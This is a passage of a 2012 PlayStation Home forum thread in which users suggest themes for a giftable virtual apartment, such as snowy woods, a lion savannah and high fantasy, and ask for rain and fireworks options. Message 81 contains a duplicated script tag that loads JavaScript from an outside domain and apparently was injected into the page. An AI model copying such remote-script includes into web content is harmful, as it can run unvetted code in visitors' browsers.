Sackboy
356 posts

Re: Help us pick the theme for a giftable apartment, please :)

Nov 9, 2012

Too bad, you miss a significant window....  :womansad:

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

Please use plain text.
Message 81 of 107 (208 Views)
0 Likes
Welcoming Committee
8518 posts

Nov 9, 2012
How about combining multiple elements from the poll and here and create a space like this.
- like sunlit meadow around same size, also set outside

- have it set in a forest/woods (many trees around a clearing perhaps

- have it ambiguous enough that it is NOT just a christmas space

- leave a large coniferous (christmas type, has pine needles instead of leaves) tree in the middle possibly so people COULD decorate with some presents, deco around it, etc.

- nighttime/dark evening theme

- have main feature of the space be the WEATHER. clearly (optional on/off) snow would be amazing in the space I'm describing but yes I equally would like it to rain. If I HAD to choose one though, I would say snow.

- Other 'fantasy' elements could be combined into a theme like this, as it already conjures up ideas of fairytales in my mind (Hansel & Gretel, Red Riding Hood, Cinderella, etc.

- cabin isnt NECCESARY but may add to the scene.

*Also - if you guys add water like sunlit meadow PLEASE allow us to enter it fully and possibly wade/swim in it like the dream island. That is an underrated AMAZING feature you guys introduced.

Thanks for involving us. Good luck :smileyhappy:
Support Forums
Please use plain text.
Message 82 of 107 (200 Views)
Monster Hunter
32 posts

Nov 9, 2012

I adore Lockwood! The items they sell and give away are top shelf...and, I might add, reasonably priced. I love the choices for the new apartment and something from LOTR would be magnificent coming from your talented graphics people, I have no doubt...but I would love to see something with a lion theme. I think some beautiful African savannah setting would make a stunning backdrop. The apartment could be like a hunt club or something with a british colonial flair. Then various lion statues for the small inner courtyard garden...or small backyard garden...whichever you use. For the house, beautifull hearld.type banners for the exterior entrance, lovely old world type furniture with lion supports or lion paw feet, pottery with a lion motif...I'm sure if you created something like this it would be spectacular!

Please use plain text.
Message 83 of 107 (183 Views)
0 Likes
Monster Hunter
32 posts

Nov 9, 2012
...and for Christmas, I would like a small cloud above my head that constantly supplies me with snowy conditions and if I stop to talk or dance, small piles of snow will accumulate at my feet!
Please use plain text.
Message 84 of 107 (181 Views)
Fender Bender
2703 posts

[ Edited ]
Nov 9, 2012

Sorry this is going to be off topic, but I put a request in on a thread a couple weeks ago and you normally acknowledge things like that, but this time you didnt so maybe you didnt read it (or you may have thought the idea sucked and thought you'd be polite  :smileyembarrassed: )

Its about the fireworks PODI, and if you could ask the designer to add an option in it (I'm aware your doing an update on it soon).

I know you can create your own displays which is a nice feature, but I normally just use the automatic selection and let PODI make the display. Would it be possible to add a choice after selecting the automatic feature to check/uncheck which boxes of fireworks we want PODI to choose from. This way we could for example, uncheck the Halloween ones when its 4th July, or uncheck a New Years selection (if you bring one out 'wink wink') on Halloween.

You could have all the boxes listed here, with the ones we dont have darkened out with a 'press triangle to buy' option on them, which may also help your sales as well.

Win win, everyones happy :smileyhappy:

Heres the link to the original thread:

http://community.us.playstation.com/t5/PlayStation-Home/Lockwood-fireworks-PODI-request/m-p/38584399...

Thankyou for hopefully catching this request this time, and again sorry for being off topic.

Please use plain text.
Message 85 of 107 (177 Views)
0 Likes
Gaming Beast
1228 posts

Nov 10, 2012

High Fantasy

218008.jpg110.jpg267fantasy-door.jpg

If we took just five minutes, to recognize each others beauty, instead of attacking each other for our differences .............
Ellen Page
Please use plain text.
Message 86 of 107 (146 Views)
Wastelander
634 posts

Nov 10, 2012

Make it larger then the last, that is larger then the harbour home. 

Note: The exact opposite of the first terrible gift home

Current home rating: 5.2/10

Please use plain text.
Message 87 of 107 (147 Views)
0 Likes
Treasure Hunter
8587 posts

Nov 10, 2012

2. Contemporary Fantasy (e.g. Harry Potter)

Folding@home Team #118000
GAPHome

General

Please use plain text.
Message 88 of 107 (139 Views)
0 Likes
Fender Bender
2271 posts

Nov 10, 2012

How about something like the shrine of worship in the PS2/PS3 remake Shadow of the Colossus?

い わs へれ 

ーそうly 
Please use plain text.
Message 89 of 107 (131 Views)
Wastelander
830 posts

[ Edited ]
Nov 10, 2012

Lockwood.... do you think you could create something adding the option of rain ?

or in the future ?

ive been asking this for over a year now and no one created a space with rain, i mean with the option to make it rain... :smileysad: :smileysad:

Im getting to think that no one will ever do it. :smileysad:

Please create something.

Please use plain text.
Message 90 of 107 (105 Views)